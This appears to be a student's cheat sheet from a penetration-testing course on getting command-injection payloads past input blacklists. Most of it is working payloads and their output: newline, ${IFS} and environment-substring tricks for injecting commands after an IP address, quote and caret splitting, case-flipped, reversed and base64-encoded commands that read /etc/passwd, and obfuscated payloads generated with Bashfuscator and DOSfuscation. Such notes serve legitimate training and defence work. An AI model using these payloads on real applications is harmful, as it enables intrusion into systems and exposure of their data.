Filter Evasion

Bypassing

;
&&
||

127.0.0.1; whoami

1. Un carácter de punto y coma;

2. Un personaje espacial

3. Una whoamiorden

Blacklisted Characters

$blacklist = ['&', '|', ';', ...SNIP...];
foreach ($blacklist as $character) {
    if (strpos($_POST['ip'], $character) !== false) {
        echo "Invalid input";
    }
}

Bypassing Space Filters

127.0.0.1%0a whoami
127.0.0.1%0a%09

Using $IFS

${IFS}
127.0.0.1%0a${IFS}

Using Brace Expansion

127.0.0.1%0a{ls,-la}

$ {ls,-la}

total 0
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 13:01 ..

Linux

$ echo ${PATH}

/usr/local/bin:/usr/bin:/bin:/usr/games

$ echo ${PATH:0:1}

/

$ echo ${LS_COLORS:10:1}

;

127.0.0.1${LS_COLORS:10:1}${IFS}

Windows

> echo %HOMEPATH:~6,-11%

\

> $env:HOMEPATH[0]

\


PS C:\> $env:PROGRAMFILES[10]
PS C:\>

Character Shifting

$ man ascii     # \ is on 92, before it is [ on 91
$ echo $(tr '!-}' '"-~'<<<[)

\

Bypassing Blacklisted Commands

Linux & Windows

w'h'o'am'i

21y4d

w"h"o"am"i

21y4d

127.0.0.1%0aw'h'o'am'i

Linux Only

who$@ami
w\ho\am\i

Windows Only

> who^ami

21y4d

Advanced Command Obfuscation

> WhOaMi

21y4d

 $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

21y4d

$(a="WhOaMi";printf %s "${a,,}")

Reversed Commands

$ echo 'whoami' | rev
imaohw

$(rev<<<'imaohw')

21y4d

> "whoami"[-1..-20] -join ''

imaohw

> iex "$('imaohw'[-1..-20] -join '')"

21y4d

Encoded Commands

$ echo -n 'cat /etc/passwd | grep 33' | base64

Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==

$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

dwBoAG8AYQBtAGkA

$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64

dwBoAG8AYQBtAGkA

> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

21y4d

Evasion Tools

Linux (Bashfuscator)

• Bashfuscator.

$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ pip3 install setuptools==65
$ python3 setup.py install --user

$ cd ./bashfuscator/bin/
$ ./bashfuscator -h

usage: bashfuscator [-h] [-l] ...SNIP...

optional arguments:
  -h, --help            show this help message and exit

Program Options:
  -l, --list            List all the available obfuscators, compressors, and encoders
  -c COMMAND, --command COMMAND
                        Command to obfuscate
...SNIP...

$ ./bashfuscator -c 'cat /etc/passwd'

[+] Mutators used: Token/ForCode -> Command/Reverse
[+] Payload:
 ${*/+27\[X\(} ...SNIP...  ${*~}   
[+] Payload size: 1664 characters

$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters

$ bash -c 'eval "$(W0=(w \  t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'

root:x:0:0:root:/root:/bin/bash
...SNIP...

Windows (DOSfuscation)

• DOSfuscation.

PS C:\> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\> cd Invoke-DOSfuscation
PS C:\> Import-Module .\Invoke-DOSfuscation.psd1
PS C:\> Invoke-DOSfuscation
Invoke-DOSfuscation> help

HELP MENU :: Available options shown below:
[*]  Tutorial of how to use this tool             TUTORIAL
...SNIP...

Choose one of the below options:
[*] BINARY      Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING    Environment variable encoding
[*] PAYLOAD     Obfuscated payload via DOSfuscation

Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

C:\> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

test_flag